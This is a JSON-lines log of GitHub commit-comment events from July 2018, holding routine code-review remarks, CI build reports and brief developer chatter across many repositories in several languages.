{"id":"7932381679","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29629761,"position":null,"line":null,"path":null,"commit_id":"4ba5202c1497dfaaaeeddd52cd16722e7b0dfb1c","created_at":"2018-07-07T13:54:14Z","updated_at":"2018-07-07T13:54:14Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-132](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-132).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-132-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-07T13:54:14Z"}
{"id":"7932382954","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29629762,"position":null,"line":null,"path":null,"commit_id":"d5ef8208fe852b75f24ba1c955b85aa89a28d099","created_at":"2018-07-07T13:55:10Z","updated_at":"2018-07-07T13:55:10Z","author_association":"COLLABORATOR","body":"![3rdlevelbloom](https://user-images.githubusercontent.com/25286924/42411555-06caf740-81fe-11e8-9393-460c9a1b771d.png)\r\n"}},"created_at":"2018-07-07T13:55:10Z"}
{"id":"7932383843","type":"CommitCommentEvent","actor":{"login":"StefanMeier12"},"repo":{"name":"Legrandin/pycryptodome"},"payload":{"comment":{"id":29629769,"position":null,"line":null,"path":null,"commit_id":"8b4a1c0c71725ab1ec98fc7fc14208ebbd46c3b3","created_at":"2018-07-07T13:55:47Z","updated_at":"2018-07-07T13:55:47Z","author_association":"NONE","body":"\r\n\r\n\r\nHi, I'm just learning python.\r\nEncryption with Python is very interesting. I would like to encrypt and decrypt the EBeispielordner1 folder. It would also be interesting to have several\r\nCan encrypt folders in a single slide, e.g.\r\n\r\nE/Beispielordner1\r\n\r\nE/Beispielordner2\r\n\r\nE/Beispielordner3\r\n\r\nI would like to start this program from the console without GUI.\r\n\r\nOf course there are many encryption programs, but it would be interesting to be able to use a Python encryption program without backdoor.\r\n"}},"created_at":"2018-07-07T13:55:47Z"}
{"id":"7932386547","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29629774,"position":null,"line":null,"path":null,"commit_id":"a227a3808111edba6259377c5a3bcd9b5c072b0e","created_at":"2018-07-07T13:57:44Z","updated_at":"2018-07-07T13:57:44Z","author_association":"MEMBER","body":"Can you please proof-read and compile before committing/pushing?  You consistently create commit noise with these kinds of corrections that really shouldn't need to happen."}},"created_at":"2018-07-07T13:57:44Z"}
{"id":"7932387830","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29629776,"position":9,"line":4,"path":"lesson8/passenger_wagon.rb","commit_id":"747cdcad6b575376eb75c85263b4174e2bc5bac7","created_at":"2018-07-07T13:58:40Z","updated_at":"2018-07-07T13:58:40Z","author_association":"NONE","body":"Когда ты исправишь комент ниже, это будет уже не релевантно, но обрати внимание, что эту переменную ты никак не используешь"}},"created_at":"2018-07-07T13:58:40Z"}
{"id":"7932388970","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29629777,"position":null,"line":null,"path":null,"commit_id":"a227a3808111edba6259377c5a3bcd9b5c072b0e","created_at":"2018-07-07T13:59:27Z","updated_at":"2018-07-07T13:59:27Z","author_association":"MEMBER","body":"Oh, and not compiling at all is definitely not a \"minor\" issue with a commit."}},"created_at":"2018-07-07T13:59:27Z"}
{"id":"7932389444","type":"CommitCommentEvent","actor":{"login":"garious"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29629778,"position":null,"line":null,"path":null,"commit_id":"cdbb59b8ddd0f72cd7cc63e4556cf1a1d46f0b8f","created_at":"2018-07-07T13:59:49Z","updated_at":"2018-07-07T13:59:49Z","author_association":"MEMBER","body":"mem::replace() was right. You just needed an explicit drop() on old_val. Keep thread_hdls private. @aeyakovenko"}},"created_at":"2018-07-07T13:59:49Z"}
{"id":"7932389742","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629780,"position":49,"line":49,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T14:00:02Z","updated_at":"2018-07-07T14:00:02Z","author_association":"OWNER","body":"У меня там была проверка на отрицательное значение, она не даст телепортироваться, напишет что уже на конечной станции. Про методы понял\r\n "}},"created_at":"2018-07-07T14:00:02Z"}
{"id":"7932394210","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29629793,"position":8,"line":3,"path":"lesson8/passenger_wagon.rb","commit_id":"747cdcad6b575376eb75c85263b4174e2bc5bac7","created_at":"2018-07-07T14:02:58Z","updated_at":"2018-07-07T14:02:58Z","author_association":"NONE","body":"по ТЗ метод не должен принимать аргументы, потому что он всегда должен добавлять по 1 единице"}},"created_at":"2018-07-07T14:02:58Z"}
{"id":"7932395876","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"vlaidmeR/Hadi"},"payload":{"comment":{"id":29629800,"position":null,"line":null,"path":null,"commit_id":"4e8c6a2e888d2e6e2e74e9e14beca618dc6edb6f","created_at":"2018-07-07T14:04:16Z","updated_at":"2018-07-07T14:04:16Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-07T14:04:16Z"}
{"id":"7932396318","type":"CommitCommentEvent","actor":{"login":"kfabick03"},"repo":{"name":"kfous/ProgrammingAssignment2"},"payload":{"comment":{"id":29629801,"position":null,"line":null,"path":null,"commit_id":"846eef9f0662ca82f734e1df9723560131807e6c","created_at":"2018-07-07T14:04:37Z","updated_at":"2018-07-07T14:04:37Z","author_association":"NONE","body":"Very clear code and choice of variable and function names!  I am wondering if you have accidentally used the wrong variable for the argument of the function in line 4.  You use the letter \"m\" as the argument, but I think maybe it should be \"x\"."}},"created_at":"2018-07-07T14:04:37Z"}
{"id":"7932397191","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29629803,"position":7,"line":84,"path":"src/common/classes/alloc.h","commit_id":"69523f1886e967cd1491bc4da9939528b404d288","created_at":"2018-07-07T14:05:18Z","updated_at":"2018-07-07T14:05:18Z","author_association":"MEMBER","body":"Any good reason to use a preprocessor macro instead of a constant?"}},"created_at":"2018-07-07T14:05:18Z"}
{"id":"7932399388","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629805,"position":6,"line":1,"path":"results.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T14:06:58Z","updated_at":"2018-07-07T14:06:58Z","author_association":"NONE","body":"вот теперь, когда ты из разных модулей свел этот код в одном месте он стал понятней мне\r\nи у меня возникли еще вопросы ))))\r\nпо сути, методы `lose`, `win`, `draw`, `continue` - они относятся либо к классу МайГейм, либо к классу Раунд, про который я тебе написал в слаке... это методы рантайма... и по названиям и по тому факту, что они вызывают методы интерфейса\r\nметод \"верифай\" я пока не очень понимаю куда в твой структуре можно приткнуть... может быть здесь ему и место"}},"created_at":"2018-07-07T14:06:58Z"}
{"id":"7932403417","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629811,"position":6,"line":1,"path":"results.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T14:10:07Z","updated_at":"2018-07-07T14:10:07Z","author_association":"NONE","body":"когда разберешься во всеми замечаниями посмотрим что получилось и решим что делать с этим методом - оставить здесь или еще куда-то двинуть\r\nи еще...\r\n- метод \"континью\" я бы разбил на несколько\r\n- возможно \"банковские операции\" стоит реализовать в виде методов класса Банк, а здесь их (эти методы) вызывать.. но можешь пока это не делать, если что вернемся в следующей итерации\r\n\r\n"}},"created_at":"2018-07-07T14:10:07Z"}
{"id":"7932405747","type":"CommitCommentEvent","actor":{"login":"axzxc1236"},"repo":{"name":"axzxc1236/911_Operator_zh-TW_Translation"},"payload":{"comment":{"id":29629815,"position":143,"line":4660,"path":"zh-TW.txt","commit_id":"a655d6b42f417c791e7f937ff695d232909eabbf","created_at":"2018-07-07T14:11:52Z","updated_at":"2018-07-07T14:11:52Z","author_association":"OWNER","body":"這裡少了一個\"\r\n導致嚴重錯誤"}},"created_at":"2018-07-07T14:11:52Z"}
{"id":"7932408244","type":"CommitCommentEvent","actor":{"login":"willemsteller"},"repo":{"name":"andreja6/G3D-Fun"},"payload":{"comment":{"id":29629818,"position":null,"line":null,"path":null,"commit_id":"0f609662bbc6b1db1f861c8518aba04203306246","created_at":"2018-07-07T14:13:44Z","updated_at":"2018-07-07T14:13:44Z","author_association":"COLLABORATOR","body":"nice"}},"created_at":"2018-07-07T14:13:44Z"}
{"id":"7932410254","type":"CommitCommentEvent","actor":{"login":"willemsteller"},"repo":{"name":"andreja6/G3D-Fun"},"payload":{"comment":{"id":29629825,"position":null,"line":null,"path":null,"commit_id":"0f609662bbc6b1db1f861c8518aba04203306246","created_at":"2018-07-07T14:15:15Z","updated_at":"2018-07-07T14:15:15Z","author_association":"COLLABORATOR","body":"oh cool i can see myself in the discord server"}},"created_at":"2018-07-07T14:15:15Z"}
{"id":"7932410384","type":"CommitCommentEvent","actor":{"login":"willemsteller"},"repo":{"name":"andreja6/G3D-Fun"},"payload":{"comment":{"id":29629828,"position":null,"line":null,"path":null,"commit_id":"0f609662bbc6b1db1f861c8518aba04203306246","created_at":"2018-07-07T14:15:21Z","updated_at":"2018-07-07T14:15:21Z","author_association":"COLLABORATOR","body":"hi andreja"}},"created_at":"2018-07-07T14:15:21Z"}
{"id":"7932414575","type":"CommitCommentEvent","actor":{"login":"dritter"},"repo":{"name":"dritter/powerlevel9k"},"payload":{"comment":{"id":29629834,"position":28,"line":18,"path":".github/ISSUE_TEMPLATE.md","commit_id":"fcc48e17eea6cda4bf0dc62338e2d96e2efbcebf","created_at":"2018-07-07T14:18:28Z","updated_at":"2018-07-07T14:18:28Z","author_association":"OWNER","body":"I think it would be better to write the templates in simple english. Avoiding words like \"culprit\" and \"tinkering\" would benefit all non-native english speakers.."}},"created_at":"2018-07-07T14:18:28Z"}
{"id":"7932415437","type":"CommitCommentEvent","actor":{"login":"dfederm"},"repo":{"name":"daveaglick/Buildalyzer"},"payload":{"comment":{"id":29629835,"position":154,"line":250,"path":"src/Buildalyzer/ProjectAnalyzer.cs","commit_id":"8e37263b14000adcaf875139c0ea7591e58df60a","created_at":"2018-07-07T14:19:01Z","updated_at":"2018-07-07T14:19:01Z","author_association":"CONTRIBUTOR","body":"@daveaglick This may help shed some light: https://github.com/Microsoft/msbuild/pull/2414. The gist though is that the act of running restore might alter the import graph, particularly the generated `*.nuget.g.(props|targets)` files, and once evaluation is done (properties and static items evaluated; before targets are run), those values won't change even if the original conditions do, like files suddenly existing as part of running targets which didn't before."}},"created_at":"2018-07-07T14:19:01Z"}
{"id":"7932415843","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29629836,"position":null,"line":null,"path":null,"commit_id":"e16bfd8e79003ccc785043c86085bb76342f7495","created_at":"2018-07-07T14:19:16Z","updated_at":"2018-07-07T14:19:16Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-132](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-132).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-132-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-07T14:19:16Z"}
{"id":"7932416054","type":"CommitCommentEvent","actor":{"login":"maksbotan"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29629837,"position":93,"line":185,"path":"ui/vty/src/Ariadne/UI/Vty/Widget.hs","commit_id":"9f0cfead26a577a88337b2fe1d22ef665e488bc2","created_at":"2018-07-07T14:19:26Z","updated_at":"2018-07-07T14:19:26Z","author_association":"CONTRIBUTOR","body":"What is `p` here?"}},"created_at":"2018-07-07T14:19:26Z"}
{"id":"7932417638","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29629839,"position":17,"line":17,"path":"lesson8/main.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T14:20:39Z","updated_at":"2018-07-07T14:20:39Z","author_association":"NONE","body":"Как-то этот метод тут висит в глобальной области видимости. Давай его в интерфэйс спрячем"}},"created_at":"2018-07-07T14:20:39Z"}
{"id":"7932417907","type":"CommitCommentEvent","actor":{"login":"goodsoft"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29629840,"position":93,"line":185,"path":"ui/vty/src/Ariadne/UI/Vty/Widget.hs","commit_id":"9f0cfead26a577a88337b2fe1d22ef665e488bc2","created_at":"2018-07-07T14:20:51Z","updated_at":"2018-07-07T14:20:51Z","author_association":"CONTRIBUTOR","body":"parent's `WidgetInfo`, as everywhere else"}},"created_at":"2018-07-07T14:20:51Z"}
{"id":"7932420948","type":"CommitCommentEvent","actor":{"login":"josephsum74"},"repo":{"name":"josephsum74/how-to-use-github"},"payload":{"comment":{"id":29629842,"position":null,"line":null,"path":null,"commit_id":"e955fc73a354a2082ae9fedc17e32f697cddc742","created_at":"2018-07-07T14:23:07Z","updated_at":"2018-07-07T14:23:07Z","author_association":"OWNER","body":"This line is added to see how the change in the markdown file will affect the repository."}},"created_at":"2018-07-07T14:23:07Z"}
{"id":"7932421318","type":"CommitCommentEvent","actor":{"login":"sbrodin"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29629843,"position":null,"line":null,"path":null,"commit_id":"2a7294a9329889656bc226b00ca5f71f3918f558","created_at":"2018-07-07T14:23:23Z","updated_at":"2018-07-07T14:23:23Z","author_association":"NONE","body":"@trebmuh, check your French dictionnary, your correction is wrong..."}},"created_at":"2018-07-07T14:23:23Z"}
{"id":"7932428517","type":"CommitCommentEvent","actor":{"login":"dm94"},"repo":{"name":"Gagong/Toshinou-Revamped"},"payload":{"comment":{"id":29629851,"position":null,"line":null,"path":null,"commit_id":"300df3444e0bf8df0d48618d9f2e674f49af08f8","created_at":"2018-07-07T14:28:39Z","updated_at":"2018-07-07T14:28:39Z","author_association":"COLLABORATOR","body":"EN\r\nIt has only been updated as a personal challenge.\r\nNo action has been taken for the new anti-bot system so the probability of banning is high\r\n\r\nES\r\nSólo se ha actualizado como reto personal.\r\nNo se ha tomado ninguna medida para el nuevo sistema anti bots por lo que la probabilidad de baneo es alta\r\n"}},"created_at":"2018-07-07T14:28:39Z"}
{"id":"7932429630","type":"CommitCommentEvent","actor":{"login":"AGraber"},"repo":{"name":"pawn-lang/YSI-Includes"},"payload":{"comment":{"id":29629856,"position":null,"line":null,"path":null,"commit_id":"3baec21f8ca0bcf3c44473904fbc624145773a97","created_at":"2018-07-07T14:29:30Z","updated_at":"2018-07-07T14:29:30Z","author_association":"NONE","body":"oh shit"}},"created_at":"2018-07-07T14:29:30Z"}
{"id":"7932430349","type":"CommitCommentEvent","actor":{"login":"RSpe"},"repo":{"name":"RSpe/SVD-reconstruction"},"payload":{"comment":{"id":29629858,"position":null,"line":null,"path":null,"commit_id":"ac43e0f152b1f6b4a0320c19a6288ea33ff3e832","created_at":"2018-07-07T14:30:00Z","updated_at":"2018-07-07T14:30:00Z","author_association":"OWNER","body":"Add me.pgm"}},"created_at":"2018-07-07T14:30:00Z"}
{"id":"7932432827","type":"CommitCommentEvent","actor":{"login":"lem9"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29629863,"position":null,"line":null,"path":null,"commit_id":"2a7294a9329889656bc226b00ca5f71f3918f558","created_at":"2018-07-07T14:31:38Z","updated_at":"2018-07-07T14:31:38Z","author_association":"CONTRIBUTOR","body":"To confirm : https://fr.wikipedia.org/wiki/Espace_(typographie). « Une espace (nom féminin) est, en typographie, un caractère particulier qui permet d’insérer un espacement blanc dans le texte. »"}},"created_at":"2018-07-07T14:31:38Z"}
{"id":"7932433421","type":"CommitCommentEvent","actor":{"login":"viveksyngh"},"repo":{"name":"viveksyngh/faas"},"payload":{"comment":{"id":29629864,"position":null,"line":null,"path":null,"commit_id":"51f7818dcc7fb17bcac5f41e595af5babcdd47ec","created_at":"2018-07-07T14:32:05Z","updated_at":"2018-07-07T14:32:05Z","author_association":"OWNER","body":"Yes, It does support default value. \r\n\r\nhttps://github.com/viveksyngh/faas/commit/91dce28ef957ad25068c6f2957439d211d457fb4"}},"created_at":"2018-07-07T14:32:05Z"}
{"id":"7932435679","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29629866,"position":null,"line":null,"path":null,"commit_id":"c3fb11c2c98a5c28ece6a27093a0f9def350ac64","created_at":"2018-07-07T14:33:42Z","updated_at":"2018-07-07T14:33:42Z","author_association":"CONTRIBUTOR","body":"Why has Gaplus and Raiden now a different refresh rate?\r\n\r\nRaiden (raiden.cpp) from 59.6 to 59Hz\r\nGaplus (gaplus.cpp) from 60.606060 to 60Hz"}},"created_at":"2018-07-07T14:33:42Z"}
{"id":"7932437573","type":"CommitCommentEvent","actor":{"login":"taekminKim"},"repo":{"name":"redysj0517/StudyWithTM"},"payload":{"comment":{"id":29629868,"position":8,"line":8,"path":"eclipse-workspace/Study-With-TM/src/day20180707/TestMain.java","commit_id":"74c8551ad6dc6d30e916c723cab55ae1c4401fc9","created_at":"2018-07-07T14:35:04Z","updated_at":"2018-07-07T14:35:04Z","author_association":"COLLABORATOR","body":"이건 vi 에디터로 했군요!"}},"created_at":"2018-07-07T14:35:04Z"}
{"id":"7932439568","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29629871,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-07T14:36:28Z","updated_at":"2018-07-07T14:36:28Z","author_association":"NONE","body":"3188534644"}},"created_at":"2018-07-07T14:36:28Z"}
{"id":"7932440135","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29629872,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-07T14:36:53Z","updated_at":"2018-07-07T14:36:53Z","author_association":"NONE","body":"lineage14.1已经开机了，声音WiFi正常，相机能预览不能拍照，然后SD卡不能用"}},"created_at":"2018-07-07T14:36:53Z"}
{"id":"7932442469","type":"CommitCommentEvent","actor":{"login":"ChaosKid42"},"repo":{"name":"processone/ejabberd"},"payload":{"comment":{"id":29629875,"position":103,"line":687,"path":"src/mod_http_upload.erl","commit_id":"fface33d54f24c777dbec96fda6bd00e665327fe","created_at":"2018-07-07T14:38:32Z","updated_at":"2018-07-07T14:38:32Z","author_association":"NONE","body":"I believe this ought to be `HMAC = str:to_hexlist(crypto:hmac(sha256, Key, Data)),`"}},"created_at":"2018-07-07T14:38:32Z"}
{"id":"7932445296","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29629879,"position":null,"line":null,"path":null,"commit_id":"299ea6397692005c2206541face8f2090c7dade4","created_at":"2018-07-07T14:40:28Z","updated_at":"2018-07-07T14:40:28Z","author_association":"COLLABORATOR","body":"Before / After removing internal AA, and then applying regular FX\r\n\r\n![otheraa](https://user-images.githubusercontent.com/25286924/42411871-2e7a137e-8204-11e8-9f4e-1cfd4b0ca38d.png)\r\n"}},"created_at":"2018-07-07T14:40:28Z"}
{"id":"7932445477","type":"CommitCommentEvent","actor":{"login":"CaribbeanKelp0607"},"repo":{"name":"CaribbeanKelp0607/springboottest"},"payload":{"comment":{"id":29629880,"position":null,"line":null,"path":null,"commit_id":"3da22e9e26eb5c5a665e7893d59f69285b6cffaa","created_at":"2018-07-07T14:40:36Z","updated_at":"2018-07-07T14:40:36Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-07T14:40:36Z"}
{"id":"7932447630","type":"CommitCommentEvent","actor":{"login":"findrome"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29629884,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-07T14:42:15Z","updated_at":"2018-07-07T14:42:15Z","author_association":"NONE","body":"My wife and I both have this handset, I'm on PE and kept hers on stock because I'm a big fan of \"the control\".\r\nBoth hers and mine experience the issue in US. I've read that Jio issued a fix for what I assume are stock devices.\r\nI suppose I'm late to the game with this, my apologies. I hope this is helpful."}},"created_at":"2018-07-07T14:42:15Z"}
{"id":"7932448158","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"Nyalab/caniuse-api"},"payload":{"comment":{"id":29629885,"position":null,"line":null,"path":null,"commit_id":"11c90915c4f34543fb238b9c421f6f0733b5a81b","created_at":"2018-07-07T14:42:41Z","updated_at":"2018-07-07T14:42:41Z","author_association":"NONE","body":"Maybe it is better to update to Browserslisr 4?"}},"created_at":"2018-07-07T14:42:41Z"}
{"id":"7932448177","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29629886,"position":null,"line":null,"path":null,"commit_id":"324c5025fb6061d451a16d2a404bd0638c9e4e2c","created_at":"2018-07-07T14:42:41Z","updated_at":"2018-07-07T14:42:41Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-760](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-760).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-760-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-07T14:42:41Z"}
{"id":"7932457603","type":"CommitCommentEvent","actor":{"login":"n-peugnet"},"repo":{"name":"n-peugnet/ffff"},"payload":{"comment":{"id":29629897,"position":null,"line":null,"path":null,"commit_id":"47821345f70e3d7abfef4e5f3f3123a64d16985c","created_at":"2018-07-07T14:49:38Z","updated_at":"2018-07-07T14:49:38Z","author_association":"OWNER","body":"fixes #12 "}},"created_at":"2018-07-07T14:49:38Z"}
{"id":"7932458996","type":"CommitCommentEvent","actor":{"login":"Lanzu94"},"repo":{"name":"Lanzu94/polimi-hyp-2018-project"},"payload":{"comment":{"id":29629900,"position":null,"line":null,"path":null,"commit_id":"77ba95fbe2eba770a0992511d3e93caa1d121b20","created_at":"2018-07-07T14:50:37Z","updated_at":"2018-07-07T14:50:37Z","author_association":"OWNER","body":"\"readme\""}},"created_at":"2018-07-07T14:50:37Z"}
{"id":"7932463071","type":"CommitCommentEvent","actor":{"login":"zenzenkakkoii"},"repo":{"name":"bugLordFPT/hello_Work"},"payload":{"comment":{"id":29629903,"position":5,"line":5,"path":"demo","commit_id":"8c5f7a0f1ec1a7bed5f0c78a78a169008e6b500e","created_at":"2018-07-07T14:53:37Z","updated_at":"2018-07-07T14:53:37Z","author_association":"NONE","body":"need chi ????\r\n"}},"created_at":"2018-07-07T14:53:37Z"}
{"id":"7932463129","type":"CommitCommentEvent","actor":{"login":"YeahHuang"},"repo":{"name":"Prudenceyyx/Old-Driver"},"payload":{"comment":{"id":29629904,"position":null,"line":null,"path":null,"commit_id":"e2454fbf95c39cd0c05d008ab9a2e554e5c5cda3","created_at":"2018-07-07T14:53:39Z","updated_at":"2018-07-07T14:53:39Z","author_association":"COLLABORATOR","body":"transfer train.csv to earthquake.js to fit Google Map's API."}},"created_at":"2018-07-07T14:53:39Z"}
{"id":"7932463341","type":"CommitCommentEvent","actor":{"login":"zenzenkakkoii"},"repo":{"name":"bugLordFPT/hello_Work"},"payload":{"comment":{"id":29629905,"position":null,"line":null,"path":null,"commit_id":"8c5f7a0f1ec1a7bed5f0c78a78a169008e6b500e","created_at":"2018-07-07T14:53:49Z","updated_at":"2018-07-07T14:53:49Z","author_association":"NONE","body":"need fix more\r\n"}},"created_at":"2018-07-07T14:53:49Z"}
{"id":"7932465774","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629912,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T14:55:32Z","updated_at":"2018-07-07T14:55:32Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T14:55:32Z"}
{"id":"7932468689","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629920,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T14:57:32Z","updated_at":"2018-07-07T14:57:32Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T14:57:32Z"}
{"id":"7932469929","type":"CommitCommentEvent","actor":{"login":"zhixianwu"},"repo":{"name":"Marginal/EDMarketConnector"},"payload":{"comment":{"id":29629921,"position":null,"line":null,"path":null,"commit_id":"a7fb3017236116f047b65540da53983162b865f7","created_at":"2018-07-07T14:58:25Z","updated_at":"2018-07-07T14:58:25Z","author_association":"NONE","body":"This is so cool, my first time ever contributing to a actual software project on GitHub! :)\r\n\r\nMay I be listed as \"Cmdr Zhixian Wu\" in the acknowledgements? \"Zhixian Wu\" is my real name but also my in-game commander name. \r\n\r\nThank you so much! @Marginal "}},"created_at":"2018-07-07T14:58:25Z"}
{"id":"7932470447","type":"CommitCommentEvent","actor":{"login":"beshoywilliam2"},"repo":{"name":"beshoywilliam2/github-pages-with-jekyll"},"payload":{"comment":{"id":29629922,"position":null,"line":null,"path":null,"commit_id":"bf34e3a3024916cc4dfa48fb2b48d0edac20dfd4","created_at":"2018-07-07T14:58:46Z","updated_at":"2018-07-07T14:58:46Z","author_association":"OWNER","body":"hello there"}},"created_at":"2018-07-07T14:58:46Z"}
{"id":"7932471319","type":"CommitCommentEvent","actor":{"login":"isuru9625"},"repo":{"name":"isuru9625/vtc"},"payload":{"comment":{"id":29629924,"position":null,"line":null,"path":null,"commit_id":"f9053b450e1d9fac7f48a8217c305c7adc6544b1","created_at":"2018-07-07T14:59:29Z","updated_at":"2018-07-07T14:59:29Z","author_association":"OWNER","body":"![enrolment-form-icon-new](https://user-images.githubusercontent.com/36252725/42412147-6edebf44-8224-11e8-9bbf-ec4747c789a0.png)\r\n"}},"created_at":"2018-07-07T14:59:29Z"}
{"id":"7932475545","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29629932,"position":null,"line":null,"path":null,"commit_id":"5531f44077d94ecb03b945c15d169b04f38ff171","created_at":"2018-07-07T15:02:08Z","updated_at":"2018-07-07T15:02:08Z","author_association":"NONE","body":"@protonspring \r\nLine 619 in evaluate.cpp makes no sense because of the ^ operator:\r\n`score -= UnsupportedPawn * popcount(pe->weakPawns[Us] ^ attackedBy[Us][ALL_PIECES]);`\r\nThe ^ operator is a bitwise exclusive OR. This means if a bit is set in the second operand then the bit at the corresponding position in the first operand is flipped. So all squares without a weak pawn but attacked by Us are counted too.\r\n\r\nFollowing is correct:\r\n`score -= UnsupportedPawn * popcount(pe->weakPawns[Us] & ~attackedBy[Us][ALL_PIECES]);`"}},"created_at":"2018-07-07T15:02:08Z"}
